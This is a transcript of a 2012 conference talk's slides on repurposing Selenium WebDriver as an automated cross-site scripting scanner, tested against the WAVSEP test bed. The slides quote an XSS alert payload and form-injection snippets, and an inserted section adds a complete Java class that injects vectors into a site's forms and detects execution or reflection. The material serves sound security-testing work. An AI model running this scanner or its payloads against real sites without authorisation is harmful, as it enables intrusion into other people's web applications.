Adrian Rapan - Re-purposing Webdriver for Security Testing - EuroSTAR 2012


Transcript of Adrian Rapan - Re-purposing Webdriver for Security Testing - EuroSTAR 2012

Adrian Rapan, LMAX

Re-purposing Webdriver for Security Testing

www.eurostarconferences.com

@esconfs #esconfs

I work for…

About

• Tester/Speaker

• LinkedIn/Twitter: adyon2004

• Email: [email protected]

The drive

• Research

– Security testing

– Webdriver

– Transparency

– Groovy

Demo

• Video

Security testing

• Open Web Application Security Project (OWASP)

• MITM (man-in-the-middle) attack

• DoS attack

• Metasploit

• BackTrack (Linux distribution used in penetration testing)

• Acunetix, Netsparker, N-Stalker, ProxyStrike, XSSS

What about…

• Webdriver?

• It tests websites

• Drivers for different browser/OS pairs

• With a bit of tinkering can manipulate the DOM

How

• The test bed: Web Application Vulnerability Scanner Evaluation Project (WAVSEP)

– Reflected/Stored Cross-Site Scripting (XSS): 66 test cases, implemented in 64 JSP pages (GET & POST)

– 7 different categories of false-positive Reflected XSS vulnerabilities (GET & POST)

– Payloads comprising 44 attack vectors

Ingredients

• The attack vectors: taken from https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet and saved as an XML file

• Javascript snippets like:

<INPUT TYPE="IMAGE" SRC="javascript:alert('CrossSiteScriptingAcademia12');"></script>

Transparency

• Commercial tools… how do they do it?

• The security scanners tell you about vulnerabilities

• They’ll even offer a solution

• But how do they do it?

What about…

• Webdriver?

• Drives the browser just like a tester would

• Total transparency over what running a test actually does

• Security tests run in a real browser

• Lower false-positive rate of detection

Test case

• The browser navigates to the required webpage

• Webdriver scans for input forms, which are the delivery channel for the XSS payloads

• The XSS attack vectors are inserted into the input fields of the form

• The form is submitted

• The attack's success is verified by detecting the execution of the JavaScript snippet

Under the hood

• Getting the urls from a website as an XML

– Few tools exist online; used http://www.xml-sitemaps.com/crawlproc.html?&initurl=<<website>>

Under the hood

• Each url is opened by webdriver and scanned for FORMs

allForms = driver.findElements(By.xpath("//form"));

• All inputs from the FORM

allInputs = form.findElements(By.xpath(".//input"));

• Each input is populated by the attack vector

input.sendKeys(vector);

Under the hood

• Submit the injected FORM

form.findElement(By.xpath(".//input[@type='submit']")).click();

• Repeat for each FORM from each url

Under the hood

• The actual Webdriver test for a URL

webDriver.attack(urlToAttack).using(attackVector).run();

webDriver.executionReportFor(attackVector).waitFor();

Now for the tricky part

• Detecting if the attack succeeded

• There is one way… but it’s similar to watching paint dry

The automated way

driver.switchTo().alert() (throws NoAlertPresentException when no alert is open, so wrap it in a try/catch)

• But what if the alert is hidden in the DOM, waiting for a triggering event like a click?

Another “dirty” automated way

• Use the infamous JavascriptExecutor

((JavascriptExecutor) driver).executeScript(payloadToExecute);

• It goes against the intended usage of Webdriver – to test as a tester would

And the method is

• Running an XPath over every attribute to find the “hidden” payload and return its value; a non-empty result means the vector was reflected unencoded into an attribute (evidence of reflection, not proof of execution)

((JavascriptExecutor) driver).executeScript("return (document.evaluate(\"//@*[contains(.,'<<the attack vector>>')]\", document, null, XPathResult.STRING_TYPE, null)).stringValue")
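The whole test case described on the earlier slides (open the page, find the forms, fill the inputs, submit) together with the two detection methods above, written out as one added example in Java against the Selenium WebDriver API. This is not the speaker's code and does not reproduce the webDriver.attack(...).using(...).run() DSL from the slides; the class name, the placeholder target URL and the input-type filter are this example's own choices, and it assumes the Selenium WebDriver Java bindings on the classpath and a Firefox browser with its driver on the machine.

```java
import java.util.ArrayList;
import java.util.List;

import org.openqa.selenium.Alert;
import org.openqa.selenium.By;
import org.openqa.selenium.JavascriptExecutor;
import org.openqa.selenium.NoAlertPresentException;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.WebElement;
import org.openqa.selenium.firefox.FirefoxDriver;

/**
 * Added example, not the speaker's code: one XSS test case for one URL and one
 * attack vector, following the slides' steps (open page, find forms, fill inputs,
 * submit, detect). Assumes the Selenium WebDriver Java bindings on the classpath
 * and a browser driver on the PATH; the target URL in main() is a placeholder.
 */
public class WebDriverXssProbe {

    // Marker reused from the slides' payload so a hit can be attributed to this vector.
    static final String MARKER = "CrossSiteScriptingAcademia12";
    static final String VECTOR =
        "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('" + MARKER + "');\">";

    /** Sends the vector through every form on the page; returns one line per hit. */
    static List<String> attack(WebDriver driver, String urlToAttack, String vector, String marker) {
        List<String> hits = new ArrayList<>();
        driver.get(urlToAttack);
        int formCount = driver.findElements(By.xpath("//form")).size();

        for (int i = 0; i < formCount; i++) {
            // Submitting navigates away, so reload and re-locate the form each round;
            // the WebElement handles from the previous page are stale.
            driver.get(urlToAttack);
            WebElement form = driver.findElements(By.xpath("//form")).get(i);

            // Only type into inputs a user could type into: sendKeys on a hidden or
            // submit input throws instead of delivering anything.
            List<WebElement> inputs = form.findElements(By.xpath(
                ".//input[not(@type) or @type='text' or @type='search' or @type='url' or @type='email']"));
            if (inputs.isEmpty()) {
                continue;
            }
            for (WebElement input : inputs) {
                input.clear();
                input.sendKeys(vector);
            }

            // Prefer the slides' submit button; fall back to submitting the form itself.
            List<WebElement> submits = form.findElements(By.xpath(".//input[@type='submit']"));
            if (!submits.isEmpty()) {
                submits.get(0).click();
            } else {
                form.submit();
            }

            String outcome = detect(driver, marker);
            if (outcome != null) {
                hits.add(urlToAttack + " form #" + i + ": " + outcome);
            }
        }
        return hits;
    }

    /**
     * Step 1: a blocking alert carrying the marker means the payload executed.
     * Step 2: otherwise look for the marker inside any attribute (the slides'
     * JavascriptExecutor method). That only proves the vector was reflected
     * unencoded and is waiting for an event, so it is reported as a separate outcome.
     */
    static String detect(WebDriver driver, String marker) {
        try {
            Alert alert = driver.switchTo().alert();
            String text = alert.getText();
            alert.accept(); // dismiss it, or every later WebDriver command fails
            if (text.contains(marker)) {
                return "payload executed (alert text: " + text + ")";
            }
        } catch (NoAlertPresentException e) {
            // no alert open: fall through to the DOM search
        }
        // Search for the marker, not the whole vector: the vector's own quotes would
        // break the XPath string literal.
        String js = "var xp = \"//@*[contains(., '\" + arguments[0] + \"')]\";"
                  + "return document.evaluate(xp, document, null, XPathResult.STRING_TYPE, null).stringValue;";
        Object found = ((JavascriptExecutor) driver).executeScript(js, marker);
        if (found != null && !found.toString().isEmpty()) {
            return "payload reflected into an attribute, not executed: " + found;
        }
        return null;
    }

    public static void main(String[] args) {
        WebDriver driver = new FirefoxDriver();
        try {
            // Placeholder target: point this at a WAVSEP test page of your own.
            for (String hit : attack(driver, "http://localhost:8080/target-page", VECTOR, MARKER)) {
                System.out.println(hit);
            }
        } finally {
            driver.quit();
        }
    }
}
```

Two caveats when reusing this against current browsers: a javascript: URL in an image source no longer executes in any of them, so the slide's INPUT TYPE="IMAGE" vector can only be caught by the attribute search, and that hit must be read as an unencoded-reflection finding rather than a confirmed execution; and an alert left open makes every subsequent WebDriver command fail, which is why detect() always accepts it before going on.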

Some conclusions

• Writing tests to cover security test cases isn’t that hard

• The attack vectors for XSS are publicly available

• Using Webdriver as a security tool might be slow but offers more transparency and

• Best of all, it’s free

End

• Thank you!